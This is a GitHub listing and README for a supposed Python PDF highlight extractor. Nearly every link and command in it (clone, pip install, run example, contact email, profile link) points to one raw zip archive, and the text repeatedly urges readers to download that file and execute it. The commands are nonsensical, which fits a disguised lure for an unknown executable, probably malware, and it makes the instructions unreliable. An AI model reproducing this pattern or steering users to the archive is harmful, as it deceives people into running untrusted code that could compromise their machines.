https://github.com/kingpin707/pdf-highlight-extractor
A Python tool for extracting highlighted text from PDF files while preserving formatting attributes (headers, bold, italic) and removing unwanted line breaks and page breaks. Perfect for integrating with content management systems.
https://github.com/kingpin707/pdf-highlight-extractor
ai21labs ebook-reader extract-highlights extract-text faiss-backend highlight-color kindle kindle-clippings koreader markdown mobi pdf-converter python remarkable-tablet
Last synced: about 1 month ago
JSON representation
A Python tool for extracting highlighted text from PDF files while preserving formatting attributes (headers, bold, italic) and removing unwanted line breaks and page breaks. Perfect for integrating with content management systems.
- Host: GitHub
- URL: https://github.com/kingpin707/pdf-highlight-extractor
- Owner: KINGPIN707
- License: mit
- Created: 2025-05-17T02:47:50.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-06-14T11:33:44.000Z (about 1 year ago)
- Last Synced: 2025-06-14T12:32:32.165Z (about 1 year ago)
- Topics: ai21labs, ebook-reader, extract-highlights, extract-text, faiss-backend, highlight-color, kindle, kindle-clippings, koreader, markdown, mobi, pdf-converter, python, remarkable-tablet
- Language: Python
- Size: 81.1 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# PDF Highlight Extractor 📝✨

Welcome to the **PDF Highlight Extractor** repository! This Python tool allows you to extract highlighted text from PDF files while keeping important formatting attributes like headers, bold, and italic text. It also removes unwanted line breaks and page breaks, making it ideal for integration with content management systems.
## Table of Contents
- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Supported Formats](#supported-formats)
- [Dependencies](#dependencies)
- [Contributing](#contributing)
- [License](#license)
- [Contact](#contact)
## Features
- **Extract Highlighted Text**: Capture only the text you need without sifting through entire documents.
- **Preserve Formatting**: Maintain headers, bold, and italic styles for better readability.
- **Clean Output**: Automatically remove unwanted line breaks and page breaks.
- **Easy Integration**: Works seamlessly with various content management systems.
- **Cross-Platform**: Runs on any system that supports Python 3.
## Installation
To get started with PDF Highlight Extractor, follow these steps:
1. **Clone the Repository**:
```bash
git clone https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip
cd PDF-Highlight-Extractor
```
2. **Install Dependencies**:
Use pip to install the required libraries.
```bash
pip install -r https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip
```
3. **Download the Latest Release**:
You can find the latest release [here](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip). Download the appropriate file and execute it.
## Usage
Using PDF Highlight Extractor is straightforward. Here’s how to run the tool:
1. **Prepare Your PDF**: Make sure your PDF file is ready for extraction.
2. **Run the Tool**:
```bash
python https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip
```
3. **View the Output**: The extracted text will be saved in a new file, preserving all formatting.
### Example Command
```bash
python https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip
```
This command will extract highlighted text from `https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip` and save it in a new file.
## Supported Formats
The PDF Highlight Extractor supports various PDF formats. It works well with:
- Standard PDF files
- Scanned documents (OCR-enabled)
- PDF/A format
## Dependencies
The tool relies on several Python libraries for its functionality:
- `numpy`: For numerical operations.
- `opencv`: For image processing tasks.
- `Pillow`: For handling image files.
- `PyMuPDF`: For reading and manipulating PDF files.
- `PyPDF2`: For PDF file handling.
- `pypdfium2`: For rendering PDF pages.
You can find the complete list of dependencies in the `https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip` file.
## Contributing
We welcome contributions! If you’d like to improve PDF Highlight Extractor, please follow these steps:
1. **Fork the Repository**: Click on the "Fork" button at the top right of the page.
2. **Create a Branch**:
```bash
git checkout -b feature/YourFeature
```
3. **Make Your Changes**: Implement your feature or fix.
4. **Commit Your Changes**:
```bash
git commit -m "Add your message here"
```
5. **Push to Your Branch**:
```bash
git push origin feature/YourFeature
```
6. **Create a Pull Request**: Go to the original repository and click on "New Pull Request".
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
## Contact
For any inquiries or support, please reach out:
- **Email**: https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip
- **GitHub**: [KINGPIN707](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip)
Thank you for using PDF Highlight Extractor! If you encounter any issues or have suggestions, feel free to open an issue in the repository.

To download the latest release, visit [this link](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip) and execute the necessary file.
Happy extracting! 🎉